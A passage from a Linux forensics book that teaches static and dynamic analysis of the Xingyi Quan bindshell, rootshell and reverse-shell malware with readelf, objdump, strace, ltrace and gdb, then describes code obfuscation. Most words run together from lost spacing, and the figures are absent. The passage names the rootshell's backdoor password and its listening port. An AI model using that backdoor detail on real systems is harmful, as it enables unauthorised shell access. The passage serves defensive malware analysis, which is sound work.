.note.gnu.build-id UniqueIDthatissamefordebugandstrippedprograms(displayedbyfile)

.gnu.hash Describesahashtable(don’tworryifyoudon’tknowwhatthisis)

.dynsym Symboltablefordynamiclinking

.dynstr Stringsthatarerequiredfordynamiclinking

.gnu.version SymbolVersionTablethatcorrespondsto.dynsym

.gnu.version_r Requiredsymbolversiondefinitions

.rela.dyn Relocationinformationfor.dynamic

.rela.plt Relocationinformationfor.plt

.init Initializationcodeforthisprogram

.plt ProcedureLinkageTable

.text Theactualexecutablecode(machinecode)

.fini Terminationcodeforthisprogram

.rodata Read-onlydata

.eh_frame_hdr ExceptionhandlingC++codeforaccessing.eh_frame

.eh_frame Exceptionhandling(exceptionsareusedforerrorprocessing)

.init_array Listofinitializationcodetocallonstartup

.fini_array Listofterminationcodetocallontermination

.jcr InformationtoregistercompiledJavaclasses

.dynamic Dynamiclinkinginformation

.got GlobalOffsetTable(usedforaddressresolutionduringrelocation)

.got.plt GlobalOffsetTable(usedforaddressresolutionduringrelocation)

.data Initializeddata

.bss Unitializeddata

.comment Comment(normallyforversioncontrol)

.shstrtab Sectionnames(sectionheaderstringtable)

.symtab SymbolTable

.strtab SymbolTableentrynames

Donotbeoverlyconcernedifyoudon’tunderstandalltheofthesectionsdescribedinTable 10.2. I would posit that the majority of professional programmers do not knowaboutalloftheseeither.Themostimportonesforourpurposesare.text,.data,and.bss,whichcontainprogramcode,initializeddata,anduninitializeddata,respectively.Thefactthatourfilehasall thesesectionssuggeststhat theprogramwaswritteninC,orsimilarlanguage,andcompiledwithGCC(theGNUCompilerCollection).Intheory,thisshouldmakeiteasiertoreverseengineerthanhandcraftedAssemblycode.

The command readelf –program-headers <file> is used to parse theProgramHeaderTable(PHT).Theresultsofrunningthiscommandonxingyi_bindshellareshowninFigure10.12.Ascanbeseenfromthefigure,mostsegmentsconsistofalistofsections.Notableexceptionstothisaresegments00and07whichcontaintheProgramHeaderTable and stack, respectively.Thedescriptionof eachof these segments canbefound inTable10.3.ThePHTalso specifieswhere each segment shouldbe loadedandwhatbyte-alignmentitrequires.

FIGURE10.12

ProgramHeaderTableforxingyi_bindshell.

Table10.3.Segmentsfromxingyi_bindshell.

NumberandType Description

00–PHDR ProgramHeaderTable

01–INTERP Dynamiclinkertouse(/lib64/ld-linux-x86-64.so.2)

02–LOAD Portionoffiletoloadintomemory(firstone)

03–LOAD Portionoffiletoloadintomemory(secondone)

04–DYNAMIC Dynamiclinkinginformation

05–NOTE Extrainformation

06-GNU_EH_FRAME Exceptionhandlinginformation

07–GNU_STACK Theprogramstack

08–GNU_RELRO Memorythatshouldberead-onlyafterrelocationisdone

If a file has not been stripped,readelf can be used to list symbols. Partial outputfrom runningreadelf–symbols-Wxingyi_bindshell is shown in Figure10.13.Notice that thisoutput ismoreverbose than thatproducedbynm. It is alsoabit

moreorderly.

FIGURE10.13

Partialoutputfromrunningreadelf–symbolsagainstxingyi_bindshell.

Eachof thesectionsmaybedisplayedusingthecommandreadelf–hex-dump=<number or name> <file>. This can help you get some insight into the filewithout having to decipher the different metadata structures yourself. Running thiscommandforafewofthesectionsinxingyi_bindshellisshowninFigure10.14.Fromthefigure,we can see the program was compiled with GCC version 4.8.2-19 for Ubuntu,should be loaded with /lib64/ld-linux-x86-64.so.2, and has the SHA Build ID of12c43054c53c2e67b668eb566ed7cdb747d9dfda.It isprobablybest toavoidrunningthiscommand on sections containing code as these will not be displayed in a meaningfulmanner.Inthenextsection,wewillcoverabettertoolforexaminingexecutablecode.

FIGURE10.14

Dumpingafewsectionsfromxingyi_bindshellwithreadelf–hex-dump.

UsingobjdumptodisassemblecodeTheobjdump utility can be used to get information from an object file.Much of itsfunctionalityduplicates thatofreadelf.Oneuseful featurenot found inreadelf istheabilitytodisassembleobjectcode(convertitfrompuremachinecodetomorehuman-readableAssembly).TherearetwocommonformatsforAssemblycode:IntelandAT&T.ThedefaultistouseAT&Tsyntax,butthiscanbechangedusingthe“-Mintel”option.TheIntelformatseemstobepreferredbyPCprogrammers.Itisimportanttorealizethatdisassembly with a tool like this is not perfect, as any data in the sections normallycontainingcodewillbeinterpretedasmachinecodeinstructions.

Thecommandobjdump–disassemble-Mintelxingyi_bindshellwilldisassemblethesectionsofthefilenormallyexpectedtocontaincode.PartialresultsfromrunningthiscommandareshowninFigure10.15.Thesnippetshownispartofthemainmethodoftheprogram.WhileacompleteAssemblytutorialiswelloutofscopeforthisbook,an introduction to thebasicscanbehelpful inunderstanding thiscode.Assumingthecodehasnotbeenintentionallyobfuscated,onlyabasicunderstandingofAssemblyisrequiredtogetthegistofwhatisgoingon.

Assemblylanguageinstructionsareprettybasic.Theymostlyconsistofmovingthingsaround; simplemath like addition, subtraction, andmultiplication; comparing numbers;jumpingtonewmemoryaddresses;andcallingfunctions.Forcommandsthatmovethingsaround,thesourceandtargetcanbememorylocationsorhigh-speedstorageareasintheCPUcalledregisters.

Some of these registers have a special purpose, and the rest are used for performingcalculations or passing variables to functions. Some of the registers have been aroundsince the 16-bit processors of old (8086, 80286), others were added when 32-bitprocessorswere released (80386 and newer),while still otherswere addedwhenAMDreleasedthefirst64-bitprocessors.Standard64-bitprocessorregistersareshowninFigure10.16.Thelegacyregistersarenamedbasedonwidth.XX,EXX,andRXXdenote16-bit,32-bit,and64-bitwideregisters,respectively.Some16-bitregisterscanbefurtherdividedintoXHandXLfor thehighand lowbytes, respectively.Using theRAXregisterasanexampleAL,AX,EAX,andRAXrepresentthelowestbyte,twobytes,fourbytes,andalleightbytesoftheregister,respectively.WhenviewingAssemblycode,youwilloftenseedifferentwidthregistersusedbasedonneed.

TheRIP (or EIP for 32-bitAssembly) register is known as the instruction pointer. Itpoints to theaddress inmemorywhere thenext instruction toberuncanbefound.TheRFLAGS register is used to keep track of status of comparisons, whether or not amathematicaloperationresultedinaneedtocarryabit,etc.TheRBPregisterisknownasthebasepointer,and itpoints to thebase (bottom)of thecurrent stack frame.TheRSPregisteriscalledthestackpointer,anditpointstothetopofthecurrentstackframe.Sowhatisastackframe?

A stack frame is a piece of the stackwhich is associatedwith the currently runningfunctioninaprogram.So,whatthenisastack?ThestackisaspecialmemoryareathatgrowseachtimeanewfunctioniscalledviatheAssemblyCALLinstructionandshrinkswhenthisfunctioncompletes.InCandsimilarlanguagesyouwillhearpeopletalkaboutstack variables that are automatically createdwhendeclared andgo away at the endoftheircodeblock.Thesevariablesareallocatedonthestack.Whenyouthinkaboutwhatafunctionis, it isalwaysacodeblockofsometype.Thelocalvariablesforfunctionsaretypicallyallocatedonthestack.

Whenlargeramountsofstoragearerequiredorvariablesneedtolivebeyondasinglefunction, variablesmay be created on the heap. Themechanism for getting heap spacediffersfromoneprogramminglanguagetothenext.Ifyoulookattheinternalsofhowtheoperating system itself creates heaps and doles out memory to various processes, it isactuallyquitecomplex.

When reverse engineering applications in order to find vulnerabilities, the stack andheapplayacentralroleintheprocess.Forourpurposesitissufficienttounderstandthatthestackisthemostcommonplaceforfunctionstostoretheirlocalvariables.IfyoulookbackatFigure10.15,youwillseethatthefirstinstruction,pushrbp,isusedtosavethecurrentbasepointer(bottomofthestackframe)tothestack.Thecurrentstackpointeristhenmovedtothebasepointerwiththecommandmovrbp,rsp,(recallthatthetargetisontheleftandsourceontherightinIntelnotation).OnthenextlinethecurrentvaluestoredinRBXissavedbypushingitontothestack.Onthenextline0x88issubtractedfromthestackpointerwiththeinstructionsubrsp,0x88.

FIGURE10.15

Partialresultsfromdisassemblingxingyi_bindshellwithobjdump.

Youmightbethinking,“Holdonasecond,whydidIsubtracttogrowthestack?”Thereason for this is that the stack grows downward (from highmemory addresses to lowmemoryaddresses).Bymovingtheoldstackpointer(inRSP)tothebasepointer(RBP),the old top of the stack frame has become the new bottom. Subtracting 0x88 from thestackpointerallocates0x88bytesforthecurrentstackframe.Thisnewstorageisusedbythecurrentfunction.IfyoulookatFigure10.15,youwillseeseveralmovinstructionsthatmovevaluesintothisnewlyallocatedstackbuffer.Thedestinationsforallofthesemovesarememoryaddressescontained in thesquarebrackets,whichareallof theform[rbp-<someoffset>].

There is also an odd instruction,xoreax,eax, among themove instructions. Thebitwise exclusive-OR (XOR) operator compares each bit in two numbers, and thecorrespondingbitintheresultis1ifeither,butnotboth,oftheinputvalueshada1inthatposition.TheeffectofXORinganynumberwithitselfisthesameassettingthatnumbertozero.Therefore,xoreax,eax is the sameasmoveax,0x0. Readerswho havedone any shell coding will realize that use of XOR is preferred in that situation as itpreventsazerobyte(whichisinterpretedasaNULLinmanycases)frombeingpresentincodeyouaretryingtoinject.

Following the block of move instructions we see a call instruction. In high levellanguagescallingafunctionandpassinginabunchofparametersisprettysimple.HowdoesthisworkinAssembly?Thereneedstobeacallingconventioninplacethatdictateshow parameters are passed into and out of a function. For various technical reasons,multiple callingconventionsareusedbasedon the typeof functionbeingcalled.32-bitsystems normally pass in parameters on the stack (ordered from right to left). 64-bit

systemsnormallypassinparametersintheregistersRDI,RSI,RDX,RCX,R8,R9,andplaceanyadditionalparametersonthestack(alsoorderedrighttoleft).ReturnvaluesarestoredininEAX/EDXandRAX/RDXfor32-bitand64-bitsystems,respectively.Oneofthe reasons that there are multiple calling conventions is that some functions (such asprintf in C) can take a variable number of arguments. In addition to specifying whereparametersare stored,acallconventiondefineswho is responsible (callerorcallee) forreturningthestackandCPUregisterstotheirpreviousstatejustbeforethefunctionwascalled.

Armedwiththeknowledgefromthepreviousparagraph,wecanseethetwolines,movedi,0x100 andcall<n_malloc> are used to call the n_malloc function with asingle parameter whose value is 0x100 (256). The return value, a pointer to memoryallocatedontheheap,isthenstoredonthestackframeonthenextline,movQWORDPTR[rbp-0x58],rax.Onthelinesthatfollow,theputcharandpopenfunctionsarecalled.

The return value from the call to popen is stored in the stack frameon the linemovQWORDPTR[rbp-0x70],rax.Thenextlinecomparesthereturnvaluewithzero.Ifthe return valuewas zero, the lineje400fe7<main+0xbc> causes execution tojump to0x400FE7.Otherwise, execution continueson thenext line at 0x400FB2.Notethatthemachinecodeis0x740x35.Thisisknownasashortconditionaljumpinstruction(opcode is0x74), that tells thecomputer to jumpforward0x35bytes if thecondition ismet.Objdumpdidthemathforyou(0x400FB2+0x35=0x400FE7),andalsotoldyouthislocationwas0xBCbytesfromthestartofthemainfunction.Thereareotherkindsofjumpsavailable,fordifferentconditionsornoconditionatall,andforlongerdistances.

Otherthanthereturninstruction,ret,thereisonlyoneremainingAssemblyinstructionfoundinthemainfunctionthathasnotyetbeendiscussed.Thisinstructionisnotinthesnippet from Figure 10.15. This instruction is lea, which stands for Load EffectiveAddress.Thisinstructionperformswhatevercalculationsyoupassitandstorestheresultsinaregister.Thereareafewdifferencesbetweenthisinstructionandmostoftheothers.First, you may have more than two operands. Second, if some of the operands areregisters,theirvaluesarenotchangedduringtheoperation.Third,theresultcanbestoredinanyregister,includingregistersnotusedasoperands.Forexample,learax,[rbp-0x50]willloadthevalueofthebasepointerminus0x50(80)intheRAXregister.

FIGURE10.16

Registersformodern64-bitprocessors.

TheendofthedisassemblyofthemainfunctionbyobjdumpisshowninFigure10.17.The highlighted lines are cleanup code used to return the stack and registers to theirprevious state. Notice that we add back the 0x88 that was subtracted fromRSP at thebeginningofthefunction,andthenpopRBXandRBPoffthestackinthereverseorderfromhow theywere pushedon.Note that in the calling convention usedhere, it is thecallee(mainfunctioninthiscase)thatisresponsibleforrestoringregistersandthestacktotheirpreviousstate.Functions(suchasprintf)thatacceptavariablenumberofparameters,requireadifferentcallingconvention,inwhichthecallermustperformthecleanup,asthecalleedoesnotknowwhatwillbepassedintothefunction.

FIGURE10.17

Cleanupcodeattheendofthemainfunction.Notethatthelinesaftertheretinstructionareprobablydata,notinstructionsasdepicted.

The bytes after the return instruction have been misinterpreted as machine codeinstructionsbyobjdump.LaterwhenweusetheGNUDebugger(gdb) todisassembletheprogram, all of theprogramwill bedisassembledproperly.For this reason,wewilldelayprovidingthefulloutputfromobjdumphere.

Up to this point we have been discussing what is known as static analysis. This isessentially dead analysis of a program that is not running. While using a tool likeobjdump todisassembleaprogrammight lead tosomeminorerrors, it issafebecausetheprogram is never executedonyour forensicsworkstation.Often this is sufficient, ifyourprimarygoalistodetermineifafileismaliciousorbenign.Youcertainlycoulduseatoolsuchasgdb togetamoreaccuratedisassemblyofanunknownexecutable,butbecarefulnottoruntheprograminthedebuggeronyourforensicsworkstation!

DYNAMICANALYSISDynamic analysis involves actually running a program to seewhat it does.There are anumberoftoolsthatyoucanusetoanalyzeanunknownprogram’sbehavior.Beforeweproceed,weneedtotalkaboutsafety.Thinkaboutit.Doesrunninganunknown,possiblymaliciousprogramonyourforensicsworkstationsoundlikeagoodidea?Youhavetwobasic choices. Either you can use some spare hardware that is disconnected from thenetworkandonlyusedforexaminingunknownfiles,oryoucansetupavirtualmachineusingVirtualBox,VMWare,orothervirtualizationsoftware.

The separate machine is the safest option. This allows you to run the programwith

recklessabandon,knowing thatyouwill re-image themachinewhenyouaredonewithyour analysis.Virtualization is definitelymore convenient, but there is potential risk toyourhostmachine ifyoumisconfigure thevirtualmachine. Ifyoudousevirtualization,makesure thatyouhavenonetworkconnections to thevirtualmachine.Also,beawarethatsomesmartmalwarewilldetectthatitisbeingruninsideavirtualmachineandrefuseto run or, even worse, attempt to exploit possible vulnerabilities in the virtualizationsoftwaretoattackthehostmachine.

If you need an image for your virtualmachine, you could use a fresh install of yourfavoriteLinuxdistribution.Ifyouthinkyouwillbeinvestigatingunknownbinariesoften,youmight consider backing up the virtual disk file after you have installed all of yourtools and before transferring any unknown files to the virtualmachine.Remember thatmostvirtualizationsoftwarewillinstallaNATnetworkinterfaceouttotheInternetwhichyoushoulddisable! Ifyou reallywant toduplicate the subject system,youcancreateavirtualmachinefromthesubjectdisk image.Thisassumes thatyouhavesufficientdiskspace,RAM,etc.Thecommandtoconverttherawimagetoavirtualharddiskfile,ifyouare using VirtualBox, is vboxmanage internalcommands converthd -srcformat raw -dstformat vhd <raw image> <destination vhdfile>. ThePAS subject system running in a virtualmachine (without networking!) isshowninFigure10.18.

FIGURE10.18

RunningthePASsubjectsysteminaVMafterconvertingtherawimagetoaVHDfile.

TracingsystemcallsThestraceutilitycanbeusedtotracewhichsystemcallsarebeingmadebyaprogram.

Thisprogramworksbyrunningaprogramandkeepingtrackof(tracing)anysystemcallsthat are made. Never run this command against an unknown binary on your forensicsworkstation. Only run this inside a sandbox in a virtualmachine or on your dedicatedmachinesformalwareinvestigationdescribedabove.Inadditiontobeingcautiouswhenrunningthiscommand, thereareafewthingsthatyoushouldkeepinmind.First,whenyouruntheprogramasanyoneotherthanroot,itmightfailbecauseofpermissionissues.Second,ifcommandlineparametersarerequired,itmightfail,oratleasttakeadifferentexecution path, that can make it hard to see what it does. Third, it may require somelibrariesnot installed inyour testenvironment. If this is thecase,youshouldbeable totell,becauseyouwillseesystemcallsattemptingtoloadthelibraries.Partialoutputfromrunningstraceagainstxingyi_bindshellisshowninFigure10.19.

FIGURE10.19

Partialoutputfromrunningstraceagainstxingyi_bindshellinasandboxvirtualmachine.

FromFigure10.19wecansee that theClibrary(/lib/x86_64-linux-gnu/libc.so.6)wasopenedread-onlyandthecallreturnedafilehandleof3.Thefilewasreadandpartsofitweremappedtomemorysothatsomeofthefunctionsinthelibrarycanbeused.Twofilehandles automatically exist for all programs, 1 and 2, for standard out (stdout) andstandard error (stderr), respectively. The call towrite(1, “\n”, 1) is the same as callingprintf(“\n”) from a C program (which is exactly what this file is). The output fromstrace,alsoshowsthatapipewascreatedusingpopen.Popenstandsforpipeopen.Itisusedtoexecuteacommandandthenopenapipetogettheresponsesfromthecommand.Fromthereadcommandthatfollowsafewlineslater,itlooksliketheprogramistryingtodeterminetheversionofPythoninstalled.

Don’t think of strace as the perfect tool to help you understand how a programworks.Thebestwaytoseewhataprogramdoes is to trace throughitwithgdb.Using

strace is a good starting place before moving on to gdb. The results of runningstrace against anotherXingYiQuanbinary,xingyi_rootshell,withnocommand linearguments are shown inFigure 10.20.Note that the program terminatedwith a “wrongpassword” message. Rerunning this command with the “sw0rdm4n” password wediscoveredduringstaticanalysisleadstotheresultsshowninFigure10.21.

FIGURE10.20

Runningstraceagainstxingyi_rootshellwithoutapassword.

FIGURE10.21

Runningstraceagainstxingyi_rootshellwiththecorrectpasswordsupplied.

Ifwerunstraceagainstxingyi_reverse_shell,itgeneratesanerror.IfweaddtheIPaddress 127.0.0.1 to the command, it succeeds and creates a process listening on port7777,asshowninFigure10.22.

FIGURE10.22

Running strace against xingyi_reverse_shell 127.0.0.1. A process listening on port 7777 is created asconfirmedbyrunningnmap.

TracinglibrarycallsTheltraceutilityperformsasimilarfunctiontostrace,exceptthatitisusedtotracelibrary calls instead of system calls. The results of running ltrace againstxingyi_bindshellareshowninFigure10.23.WecanseethattheClibraryisbeingloaded,257bytesofmemoryareallocatedand thenfilledwithzeros,popen iscalled toget thePythonversion,theversionreturnedis2.7.6,strstriscalledandreturnszero,forkisusedtocreateanewprocess,andtheprogramexits.

FIGURE10.23

Runningltraceagainstxingyi_bindshell.

The results of running ltrace against xingyi_rootshell with the correct passwordsuppliedareshowninFigure10.24.WecanseethattheClibraryisloaded,18bytesofmemoryareallocatedandthensettozero,upto16charactersofastringarestoredinastringbuffer(probablythepasswordpassedin,butweneedtotracetheprogramwithgdbto verify this), a string is compared to “sw0rdm4n” and found to be identical, a filedescriptorisduplicated,andabashshelliscreatedusingtheCsystemfunction.

FIGURE10.24

Runningltracesagainstxingyi_rootshellwiththecorrectpasswordsupplied.

The results of runningltrace against xingyi_reverse_shell 127.0.0.1 are shown inFigure 10.25. We can see the C library is loaded, the string length of “127.0.0.1” ischecked repeatedly, fork is called creating process 3116, and twowarnings are printedbeforetheprogramexitswhenControl-Cispressed.Anewprocesslisteningonport7777hasbeencreated.

FIGURE10.25

At this point we have enough information about these binaries to say that they aremalicious.We know that they create listening sockets, shells, and have other commonmalwaretraits.Ifwewanttolearnmore,itistimetouseadebugger.

UsingtheGNUDebuggerforreverseengineeringThe GNU debugger,gdb, is the standard debugger for Linux programmers. It is verypowerful.Unfortunately, all this power comeswith a bit of a learning curve.There aresomeGraphicalUser Interface (GUI) front ends togdb, but the tool is command linebased.Iwillonlyhitthehighlightsinthisbook.Forafullcourseonhowtogetthemostfrom gdb, I recommend the GNU Debugger Megaprimer at PentesterAcademy.com(http://www.pentesteracademy.com/course?id=4).

Beforewegetstarted,IfeelthatIshouldpointoutthatgdbwasnotdesignedtobeusedforreverseengineering.Thereareotherdebuggerstailormadeforreverseengineering.Ofthese,IDAProisperhapsthemostpopular.WithpricingthatstartsinexcessofUS$1100,IDAProisnotforthecasualreverseengineer,however.

Toloadaprogramintogdb,simplytypegdb<executable>.Youshouldseesomemessages about your file, concerning whether or not it contained debugging symbols(mostfilesyouexaminelikelylacktheextradebugginginformation),astatementthatsaystotype“help”togethelp,andthena(gdb)prompt.TypinghelpleadstothescreenshowninFigure10.26.

FIGURE10.26

Thegdbmainhelpscreen.

Ifyoutypehelpinfoingdb,youwillgetalonglistofthingsthatthedebuggerwillreport on. One of these items is functions. Running info functions withxingyi_bindshellloadedinthedebuggerproducesalonglist,someofwhichisshowninFigure 10.27. Functions are displayed along with their addresses. Incidentally, gdbcommands can be abbreviated as long as they are not ambiguous. Typing inf funwouldhavereturnedthesameresults.

FIGURE10.27

Partialresultsfromrunninginfofunctionsingdb.

Asmentionedpreviously,gdbcanbeusedtodisassembleaprogram.Thecommandfordisassemblingafunctionisjustdisassemble<functionnameoraddress>,i.e.disassemblemain.Thecommandcanbeshortened todisas.Before runningthis command, you might wish to switch from the default AT&T syntax to the morecommon Intel syntax. To do so, issue the command set disassembly-flavorintel. Partial results from disassemblingmain are shown in Figure 10.28. Note that,unlike the output from objdump shown in Figure 10.15, the main function ends at0x401312.

FIGURE10.28

Partialresultsfromdisassemblingmainingdb.

If,afterviewingthedisassemblyofvariousfunctions,youdecidetoruntheprogram(inyour sandbox!), you may wish to set at least one breakpoint. The command to set abreakpoint is simply break <address or function name>. If you supply afunctionname,thebreakpointissetatthebeginningofthefunction.Thecommandinfobreak lists breakpoints. To delete a breakpoint type delete <breakpointnumber>.Therun commandwill start theprogramand runeverythingup to the firstbreakpoint (if it exists). Typingdisassemble with no name or address after it willdisassembleafewlinesafterthecurrentexecutionpoint.ThesecommandsareillustratedinFigure10.29.

FIGURE10.29

Breakpointmanagementcommands.

Ifyouarestoppedatabreakpoint,youcantakeoffrunningagaintothenextbreakpoint,if any, with continue. You may also use stepi and nexti to execute the nextAssemblyinstructionandexecutethenextAssemblyinstructionwhilesteppingoveranyfunctions encountered, respectively.When stepping through aprogram,you can just hitthe<enter>key,asthiscausesgdbtorepeatthelastcommand.TheuseofthesesteppingfunctionsisdemonstratedinFigure10.30.

FIGURE10.30

Usingsteppingfunctionsingdb.

Asyouaretracingthroughaprogram,youmightwanttoexaminedifferentchunksofmemory (especially the stack)andvarious registers.Thex (examine) command is usedforthispurpose.Thehelpforxandthefirsttwentygiantvalues(8bytes)onthestackinhexadecimal (gdb command x/20xg $rsp) are shown in Figure 10.31. Note thatbecausethestackgrowsdownward,itismucheasiertodisplayinthedebugger.

FIGURE10.31

Usingtheexaminecommandingdb.

Thecommandinforegistersdisplayalltheregisters,asshowninFigure10.32.Note that if you are running a 32-bit executable, the registerswill be namedEXX, notRXX,asdescribedearlierinthischapter.Forreverseengineering,theRBP,RSP,andRIP(base,stack,andinstructionpointers,respectively)arethemostimportant.

FIGURE10.32

Examiningregistersingdb.

Let’sturnourfocustoxingyi_rootshell,nowthatwehavelearnedsomeofthebasicsofusinggdb.First.weloadtheprogramwithgdbxingyi_rootshell.Next,wesetabreakpointatthestartofmainbytypingbreakmain.IfyoupreferIntelsyntax,issuethe command set disassembly-flavor intel. To run the program withcommand line argument(s), append the argument(s) to the run command, i.e. runsw0rdm4n.ThissequenceofinstructionsisshowninFigure10.33.

FIGURE10.33

Runningxingyi_rootshellingdb.

Runningdisassemble results in the disassemblyof the current function, completewithapointertothenextinstructiontobeexecuted.ThedisassemblyofmainisshowninFigure10.34.Thereareafewthingsthatarereadilyapparentinthissnippet.Thirty-twobytes (0x20) of space are allocated on the stack for local variables. Memory is thenallocatedontheheapwithacallton_malloc.Twoaddresses(onefromthestackandoneinsidetheprogram)areloadedintoRAXandRDX,andthenstrcmpisusedtocomparethetwostringsstoredattheselocations.Ofsignificancehereisthatthissnippetmakesitclearthisembeddedstringissomesortofpassword.

FIGURE10.34

Disassemblyofthexingyi_rootshellmainfunction.

Ifwedidnot yet realize that this embeddedvaluewas apassword,we coulduse thecommandx/s*0x6010d0 to display this password as shown in Figure 10.35.Notethatthisisextraeasybecausethebinarywasnotstrippedandhadadescriptivenameforthisvariable.Evenifitwasstripped,thefactthatanaddressisreferencedtoRIPindicatesavariablethatisembeddedintheprogrambinary.Weseetheargumenttothesystemcallisloadedfromaddress0x400B9C.Ifweexaminethiswithx/s0x400b9c,weseethatabashshellisbeingstarted.

FIGURE10.35

Usinggdbtodeterminetheprogrampasswordandtargetofsystemcall.

Whataboutthexingyi_reverse_shell?Wecandoaquickanalysisbyfollowingthesameprocedure.First,weloaditingdbwithgdbxingyi_reverse_shell.Next,weseta breakpoint inmainwithbreakmain.Optionally,we set the disassembly flavor toIntel with set disassembly-flavor intel. We can run the program with aparameter usingrun127.0.0.1. At this stage, the program should be stopped justinsideofthemainfunctionandtypingdisassemblewillproducetheoutputshowninFigure10.36.

FIGURE10.36

Disassemblingmainfromxingyi_reverse_shellingdb.

BreakingdownthedisassemblyinFigure10.36,wecanseethatthisfunctionisfairlysimple. Thirty-two (0x20) bytes of space are allocated on the stack. The number ofcommandlineparametersandthefirstparameterarestoredin[RBP–0x14]and[RBP–0x20], respectively. If the number of command line parameters is greater than1 (recallthat the program name is counted here), then we jump over the line call<_print_usage>.Theaddressof the secondcommand lineargument (locatedat thestartofthislist+0x8toskipthe8-bytepointerforthefirstargument)isloadedintoRDIand validate_ipv4_octet is called. If we did not already know that this command lineparameterwassupposedtobeanIPaddress,thiscodesnippetwouldhelpusfigureitout.Again,ifthebinarywasstripped,wewouldneedtoworkalittleharderandinvestigatethefunctionat0x400AC5tofigureoutwhat itdoes. If this functiondoesn’t returnsuccess,_print_usageiscalled.

Assumingeverythingisstillgood,thedaemonizefunctioniscalled.Onceagain,ifthebinaryhadbeenstrippedofthisdescriptivename,wewouldhavetoworkabitharderanddelve into the daemonize function to determine its purpose. We see another addressreferenced toRIP.Hereaparameter for_writepid_to_file isbeing loaded fromaddress0x6020B8. Running the command x/s *0x6020b8 reveals this string to be“/tmp/xingyi_reverse_pid”.ThisandtheremainderofthedisassemblyofmainareshowninFigure10.37.

FIGURE10.37

Secondhalfofdisassemblyofmaininxingyi_reverse_shell.

Wecanseethatfwriteiscalledacoupleoftimesandthat_log_fileisalsocalled.Ifweexamine thevalues referenced inFigure10.37,wewill see that 0x6020B0contains thevalue0x1E61(7777)and0x6020C8containsthestring“/tmp/xingyi_reverse.port”.Itwasfairlyeasytodeterminewhatthesethreebinariesdobecausetheauthormadenoattemptto obfuscate the code. The filenames, function names, variable names, etc. made thisprocess easy.What if a malware author is trying tomake things hard to detect and/orunderstand?

OBFUSCATIONThere are a number of methods malware authors will use in order to obfuscate theirprograms.The levelofsophisticationvarieswidely.Oneof themostpedestrianways toslowdownthereverseengineeristouseapacker.Apackercanbeutilizedtocompressabinaryondiskand,insomecases,speeduptheloadingprocess.Apackercompressesanexistingprogram,andtheninsertsexecutablecodetoreversetheprocessanduncompresstheprogramintomemory.

The Ultimate Packer for Executables (UPX) is a very popular cross-platform packeravailableathttp://upx.sourceforge.net. If executing thecommandgrepUPX<file>generatesanyhits,thenyoumightbedealingwithafilepackedbyUPX.Ifyougetahit,downloadtheUPXpackageanddecompressthefilewiththe-doption.ThefirstbytesinafilepackedwithUPXareshowninFigure10.38.

FIGURE10.38

ThefirstpartofafilepackedwithUPX.

Inthepastclevermalwareauthorsmighthavewrittenself-modifyingcodethatchangesas it is executed. This was quite easily done with DOS systems that had no memoryprotectionwhatsoever.Inthemodernworld,evenWindowswillmarkexecutablememoryblocksasread-only,makingthisobfuscationmethodathingofthepast.

Moderndaycompilersbenefitfromdecadesofresearchanddoagreatjobofoptimizingcode. Optimized code is also very uniform, which allows it to be more easily reverseengineered.Asa result,obfuscatedcode is likelyhandwritten inAssembly.This isbothgoodandbad.Thegood thing is thatyouhave tobea skilledAssemblycoder towritemalware this way. The bad thing is that you have to be a skilled Assembly coder tointerpret and follow the code! Again, for the purposes of incident response, if youencountercodeusing theobfuscation techniquesdiscussed in this section, it isprobablymalware. There are some paranoid companies that obfuscate their products in order todiscouragereverseengineering,butthoseproductsarefewandfarbetweenontheLinuxplatform.

Sowhat sorts of thingsmightonedo toobfuscateAssembly code?Howaboutusingobscure Assembly instructions. In this chapter, we have covered just a handful ofAssemblyinstructions.Yetthisisenoughtogetahigh-levelviewofwhatishappeninginmost programs. Start using uncommon operations, and even the experiencedAssemblycodersarerunningtoGoogleandtheirreferencemanuals.

Compilers are smart enough to replace calculations involvingonly constantswith theanswers.Forexample,ifIwanttosetaflaginposition18inabitvector,andIwritex=2^ 17 or x = 1 << 17 this will be replaced with x = 0x20000. If you see calculations

involvingonlyconstants thatareknownatcompile time,suspectobfuscation(orpoorlywrittenAssembly).

Authorsmayalsointentionallyinsertdeadcodethatisnevercalledinordertothrowthereverseengineerofftrack.IonceworkedforacompanythathadwrittentheirPCsoftwareproduct inCOBOL (yes, Iwas desperate for a jobwhen I took that one).The primaryauthoroftheirmainproducthadinsertedthousandsoflinesofCOBOLthatdidabsolutelynothing. Idiscovered thiswhenIported theprogramtoC++. Incidentally, thecompleteCOBOLlistingrequiredanentireboxofpaper.TheC++programwaslessthan200pageslong, despite running on three operating systems in graphical or console mode (oldprogramwasDOSandconsoleonly).

Authorsmightalsoinsertseverallinesofcodethatareeasilyreplacedbyasingleline.One of the techniques is to employ an intermediate variable in every calculation evenwhen this is unnecessary. Another trick is to usemathematical identities whenmakingassignments.

Oneofthefewtechniquesthatstillworkswhenprogramminginahighlevellanguageis function inlining. If you look back in this chapter, you will see that a lot of theinformationwegleaned fromour unknownbinarieswasbasedon tracing throughwhatfunctionswerecalledlocally(lookingatdisassembly),inlibraries(ltrace),andsystemcalls(strace).Inliningturnsaprogramintoonebigfunction.Theonebigfunctionwillstillhavelibraryandsystemcallsbutwillbenoticeablyhardertograsp.

SUMMARYIn thischapterwediscussedhow todetermine ifunknownfilesaremalicious.Weevencoveredthebasicsofreverseengineering.Withthischapter,wehavenowcoveredeverymajor topic in theworld ofLinux forensics. In the next chapterwewill discuss takingLinuxforensicstothenextlevel.

CHAPTER

11TheRoadAheadINFORMATIONINTHISCHAPTER:

NextstepsCommunitiesLearningmoreCongregateCertify?

NOWWHAT?You’vereadthroughthisentirebookandworkedthroughthesampleimages.Nowwhat?Theworld of information security is a big place.The subfield of forensics is also vast.While we have covered everything you need to know for a typical Linux incidentresponse,wehaveonlyscratched thesurfaceof forensicsknowledge.PerhapsyouhavedoneahandfulofrealLinuxinvestigations.Anaturalquestiontoaskis,“WheredoIgofromhere?”

COMMUNITIESDonotworkalone.Becomepartofacommunity.Ifyouwanttolimityourselfstrictlytoforensics,thisiseasiersaidthendone.Organizationsdedicatedtoforensicswithavibrantnetworkoflocalchaptersarerare.Personally,Idonotseethisasabadthing.Ithinkitisfarbetter togetplugged in to thebroader informationsecuritycommunity. Ifyou thinkaboutit,havingfriendsthatareexpertsonthingslikeoffensivesecuritycouldbehelpfultoyouinthefuture.YouwillalsofindmanydomainexpertsonLinux,Assembly,etc.inthiscommunity.

